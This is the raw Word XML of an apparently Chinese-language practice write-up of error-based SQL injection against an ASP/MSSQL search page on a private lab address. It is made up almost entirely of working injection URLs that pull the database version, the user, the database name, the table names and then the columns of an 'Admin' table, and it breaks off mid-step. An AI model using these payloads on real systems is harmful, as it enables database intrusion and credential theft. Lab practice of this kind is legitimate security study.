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4A08D" w14:textId="1C117F59" w:rsidR="002A3927" w:rsidRDefault="00F46970" w:rsidP="00F46970">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F46970">
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F46970">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>sp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F46970">
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>+mssql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F46970">
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F46970">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>注入练习</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F4947" w14:textId="463C614B" w:rsidR="00F46970" w:rsidRDefault="00F46970" w:rsidP="00F46970">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51BCA6B4" wp14:editId="2B571138">
            <wp:extent cx="5274310" cy="2988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4CD2" w14:textId="57CB612E" w:rsidR="00F46970" w:rsidRDefault="00F46970" w:rsidP="00F46970">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>由图可以判断此处存在注入点，</w:t>
      </w:r>
      <w:r w:rsidR="00E05B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>该出是搜索框内随便输入一个数字即可得到该</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E05B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E05B4B">
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E05B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>注入点在key处</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77515E6B" w14:textId="77777777" w:rsidR="00F66102" w:rsidRDefault="00F66102" w:rsidP="00F46970">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305BFB07" w14:textId="020790F9" w:rsidR="00DB485A" w:rsidRDefault="00F66102" w:rsidP="00F46970">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>获取数据库的版本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A752CE0" w14:textId="3098DB07" w:rsidR="00B93585" w:rsidRDefault="002755CA" w:rsidP="00F46970">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002755CA">
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>http://172.16.1.123/search.asp?key=11%27%20and%20@@version%3E0--+&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002755CA">
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>otype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002755CA">
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5C843A" w14:textId="07A03766" w:rsidR="00DB485A" w:rsidRDefault="00482F02" w:rsidP="00F46970">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70058130" wp14:editId="33BAEB02">
            <wp:extent cx="5274310" cy="3422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E64C" w14:textId="06E29905" w:rsidR="00F66102" w:rsidRDefault="00F66102" w:rsidP="00F46970">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E150D3D" w14:textId="2142F644" w:rsidR="00E076BC" w:rsidRDefault="00E076BC" w:rsidP="00E076BC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3039"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>判断当前用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EE51C4" w14:textId="0073A0C1" w:rsidR="00E076BC" w:rsidRDefault="00E076BC" w:rsidP="00E076BC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3039"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E076BC">
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>http://172.16.1.123/search.asp?key=11%27%20and%20user%3E0--+&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E076BC">
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>otype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E076BC">
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFD9E03" w14:textId="3094B6BE" w:rsidR="00F66102" w:rsidRDefault="00E076BC" w:rsidP="00F46970">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="275310A3" wp14:editId="60D2826E">
            <wp:extent cx="5274310" cy="24726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5A4F" w14:textId="37F7AF56" w:rsidR="0030114B" w:rsidRDefault="0030114B" w:rsidP="00F46970">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="340E50AF" w14:textId="2C61CB41" w:rsidR="0030114B" w:rsidRDefault="0030114B" w:rsidP="00F46970">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>获取当前用</w:t>
      </w:r>
      <w:r w:rsidR="008D0055">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A3D24E" w14:textId="4AD712C3" w:rsidR="0030114B" w:rsidRPr="00F46970" w:rsidRDefault="0030114B" w:rsidP="00F46970">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030114B">
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>http://172.16.1.123/search.asp?key=11%27db_name()%3E0--</w:t>
      </w:r>
      <w:r w:rsidRPr="0030114B">
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>+&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0030114B">
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>otype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0030114B">
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D0F9F1" w14:textId="61013C69" w:rsidR="00F46970" w:rsidRDefault="00F46970"/>
    <w:p w14:paraId="07777279" w14:textId="50F0C69C" w:rsidR="00AF1532" w:rsidRDefault="00AF1532">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24097B12" w14:textId="1AC33323" w:rsidR="002D1BFA" w:rsidRDefault="00F9616B" w:rsidP="00BD5D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00072F3F">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://172.16.1.123/search.asp?key=11%27%20and%20db_name()%3E0--+-&amp;otype=title&amp;submit2=%CB%D1%CB%F7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F0B20FB" w14:textId="08FCFC94" w:rsidR="002D1BFA" w:rsidRDefault="002D1BFA" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="4C124910" w14:textId="6A405360" w:rsidR="002D1BFA" w:rsidRDefault="002D1BFA" w:rsidP="00BD5D6B">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00072F3F">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://172.16.1.123/search.asp?key=11%27%20and%20(SELECT%20top%201%20Name%20FROM%20Master..SysDatabases%20where%20name%20not%20in%20(%27master%27))%3E0--+&amp;otype=title&amp;submit2=%CB%D1%CB%F7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40CB8761" w14:textId="5B157798" w:rsidR="004F536E" w:rsidRDefault="004F536E" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="6199D683" w14:textId="2AA81E00" w:rsidR="004F536E" w:rsidRDefault="004F536E" w:rsidP="00BD5D6B">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00072F3F">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://172.16.1.123/search.asp?key=11%27%20and%201=convert(int,(select%20name%20from%20master.dbo.sysdatabases%20where%20dbid=7))----+&amp;otype=title&amp;submit2=%CB%D1%CB%F7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A0A5BD1" w14:textId="77777777" w:rsidR="004F536E" w:rsidRPr="004F536E" w:rsidRDefault="004F536E" w:rsidP="00BD5D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E30E819" w14:textId="67FED6A5" w:rsidR="002D1BFA" w:rsidRPr="002D1BFA" w:rsidRDefault="002D1BFA" w:rsidP="00BD5D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由图可以看</w:t>
      </w:r>
      <w:r w:rsidR="00332D59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出数据库的名称为aa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0095486E" w14:textId="7AC9ADC1" w:rsidR="00F9616B" w:rsidRDefault="00F9616B" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="283E71B0" wp14:editId="275D4011">
            <wp:extent cx="5274310" cy="2372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D042" w14:textId="1411334B" w:rsidR="002D1BFA" w:rsidRDefault="002D1BFA" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="72E98A60" w14:textId="05FA5709" w:rsidR="002D1BFA" w:rsidRDefault="002D1BFA" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="6FE9B588" w14:textId="7FBECE51" w:rsidR="001D046D" w:rsidRDefault="0016601D" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取数据库表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280130B9" w14:textId="247B311D" w:rsidR="0016601D" w:rsidRDefault="0016601D" w:rsidP="00BD5D6B">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00072F3F">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://172.16.1.123/searc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55FDFDE6" w14:textId="6203396E" w:rsidR="0016601D" w:rsidRDefault="0016601D" w:rsidP="00BD5D6B">
      <w:r w:rsidRPr="0016601D">
        <w:t>h.asp?key=11%27and%20(select%20top%201%20name%20from%20[aa</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0016601D">
        <w:t>].sys.all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0016601D">
        <w:t>_objects%20where%20type=%27U%27%20AND%20is_ms_shipped=0)%3E0--+&amp;otype=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF1272" w14:textId="5F5FB99E" w:rsidR="00F16B6C" w:rsidRDefault="00F16B6C" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="456FA66A" wp14:editId="51606253">
            <wp:extent cx="5274310" cy="2825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C620" w14:textId="77777777" w:rsidR="00F16B6C" w:rsidRDefault="00F16B6C" w:rsidP="00BD5D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603C4D90" w14:textId="64892F53" w:rsidR="00F16B6C" w:rsidRDefault="00F16B6C" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="7DE96861" w14:textId="4527192F" w:rsidR="00F16B6C" w:rsidRDefault="002E7584" w:rsidP="00BD5D6B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他数据库表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FDEAC8" w14:textId="64EA2DA7" w:rsidR="001B61E8" w:rsidRDefault="00083D90" w:rsidP="00BD5D6B">
      <w:r w:rsidRPr="00083D90">
        <w:t xml:space="preserve">http://172.16.1.123/search.asp?key=11' and (select top 1 name from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00083D90">
        <w:t>aa.sys.all_objects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00083D90">
        <w:t xml:space="preserve"> where type='U' AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00083D90">
        <w:t>is_ms_shipped</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00083D90">
        <w:t>=0 and name not in ('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00083D90">
        <w:t>book_setup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00083D90">
        <w:t>'))&gt;0--+&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00083D90">
        <w:t>otype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00083D90">
        <w:t>=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E64F17" w14:textId="034AEED4" w:rsidR="00EB6405" w:rsidRDefault="00EB6405" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73DFF788" wp14:editId="48C9DDB3">
            <wp:extent cx="5274310" cy="2515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E379" w14:textId="2BB8AF52" w:rsidR="00EB6405" w:rsidRPr="00EB6405" w:rsidRDefault="001756B6" w:rsidP="00BD5D6B">
      <w:r w:rsidRPr="001756B6">
        <w:t xml:space="preserve">http://172.16.1.123/search.asp?key=11' and (select top 1 name from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001756B6">
        <w:t>aa.sys.all_objects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001756B6">
        <w:t xml:space="preserve"> where type='U' AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001756B6">
        <w:t>is_ms_shipped</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001756B6">
        <w:t>=0 and name not in ('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001756B6">
        <w:t>book_setup','Download</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001756B6">
        <w:t>'))&gt;0--+&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001756B6">
        <w:t>otype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001756B6">
        <w:t>=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D250AA8" w14:textId="0F28977B" w:rsidR="00EB6405" w:rsidRDefault="001756B6" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01B82AA0" wp14:editId="60F5062E">
            <wp:extent cx="5274310" cy="2749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01CF" w14:textId="1C7A178D" w:rsidR="00851388" w:rsidRDefault="00851388" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="12E63C4A" w14:textId="77777777" w:rsidR="00851388" w:rsidRDefault="00851388" w:rsidP="00BD5D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CCCAEBC" w14:textId="483F9A09" w:rsidR="001756B6" w:rsidRDefault="00423CAB" w:rsidP="00BD5D6B">
      <w:r w:rsidRPr="00423CAB">
        <w:t xml:space="preserve">http://172.16.1.123/search.asp?key=11' and (select top 1 name from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00423CAB">
        <w:t>aa.sys.all_objects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00423CAB">
        <w:t xml:space="preserve"> where type='U' AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00423CAB">
        <w:t>is_ms_shipped</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00423CAB">
        <w:t>=0 and name not in ('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00423CAB">
        <w:t>book_setup','Download','Feedback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00423CAB">
        <w:t>'))&gt;0--+&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00423CAB">
        <w:t>otype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00423CAB">
        <w:t>=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0516F2" w14:textId="7520951F" w:rsidR="00423CAB" w:rsidRDefault="00423CAB" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FB0612A" wp14:editId="62580576">
            <wp:extent cx="5274310" cy="3010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一次添加逐步获取所有的表，然后找到有用户名的那一个表</w:t>
      </w:r>
      <w:r w:rsidR="00945D3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，最终所有表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E05BD65" w14:textId="2DC5A22B" w:rsidR="00945D3F" w:rsidRDefault="00945D3F" w:rsidP="00BD5D6B">
      <w:r w:rsidRPr="00945D3F">
        <w:t xml:space="preserve">http://172.16.1.123/search.asp?key=11' and (select top 1 name from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00945D3F">
        <w:t>aa.sys.all_objects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00945D3F">
        <w:t xml:space="preserve"> where type='U' AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00945D3F">
        <w:t>is_ms_shipped</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00945D3F">
        <w:t>=0 and name not in ('book_setup','Download','Feedback','gonggao','New','News','shop_pinglun','SmallClass','SmallClass_down','sogo_link','WebBasicInfo','Admin','bigClass','BigClass_down'))&gt;0--+&amp;otype=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EB16A1" w14:textId="02CFCB26" w:rsidR="00D170AC" w:rsidRDefault="00D170AC" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="78B12E2B" w14:textId="57147AAF" w:rsidR="00D170AC" w:rsidRDefault="00D170AC" w:rsidP="00BD5D6B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B37094" w14:textId="1EBC104A" w:rsidR="00D170AC" w:rsidRDefault="00B4717E" w:rsidP="00BD5D6B">
      <w:r w:rsidRPr="00B4717E">
        <w:t xml:space="preserve">http://172.16.1.123/search.asp?key=11'and (select top 1 COLUMN_NAME from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B4717E">
        <w:lastRenderedPageBreak/>
        <w:t>aa.information</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B4717E">
        <w:t>_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B4717E">
        <w:t xml:space="preserve"> where TABLE_NAME='Admin')&gt;0--+&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B4717E">
        <w:t>otype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B4717E">
        <w:t>=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC99950" w14:textId="75A49C04" w:rsidR="00B4717E" w:rsidRDefault="00B4717E" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CF660B1" wp14:editId="0B05B95B">
            <wp:extent cx="5274310" cy="32950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3BFD" w14:textId="77777777" w:rsidR="00B4717E" w:rsidRDefault="00B4717E" w:rsidP="00BD5D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA010CE" w14:textId="05751A4C" w:rsidR="00D170AC" w:rsidRDefault="00D170AC" w:rsidP="00BD5D6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D170AC">
        <w:t xml:space="preserve">http://172.16.1.123/search.asp?key=11'and (select top 1 COLUMN_NAME from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D170AC">
        <w:t>aa.information</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D170AC">
        <w:t>_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D170AC">
        <w:t xml:space="preserve"> where TABLE_NAME='Admin' and COLUMN_NAME not in('ID'))&gt;0--+&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D170AC">
        <w:t>otype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D170AC">
        <w:t>=title&amp;submit2=%CB%D1%CB%F7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DC13A7" w14:textId="02D361AC" w:rsidR="004F04CB" w:rsidRDefault="00B4717E" w:rsidP="00BD5D6B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5386B57F" wp14:editId="43AA9999">
            <wp:extent cx="5274310" cy="3018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A3DC" w14:textId="50D8CE05" w:rsidR="00B4717E" w:rsidRDefault="00B4717E" w:rsidP="00BD5D6B"/>
    <w:p w14:paraId="28646EE7" w14:textId="41990451" w:rsidR="00B4717E" w:rsidRDefault="00F860EE" w:rsidP="00BD5D6B">
      <w:r w:rsidRPr="00F860EE">
        <w:t xml:space="preserve">http://172.16.1.123/search.asp?key=11'and (select top 1 COLUMN_NAME from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F860EE">
        <w:t>aa.information</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F860EE">
        <w:t>_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F860EE">
        <w:t xml:space="preserve"> where TABLE_NAME='Admin' and COLUMN_NAME not in('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F860EE">
        <w:t>ID','admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F860EE">
        <w:t>'))&gt;0--+&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
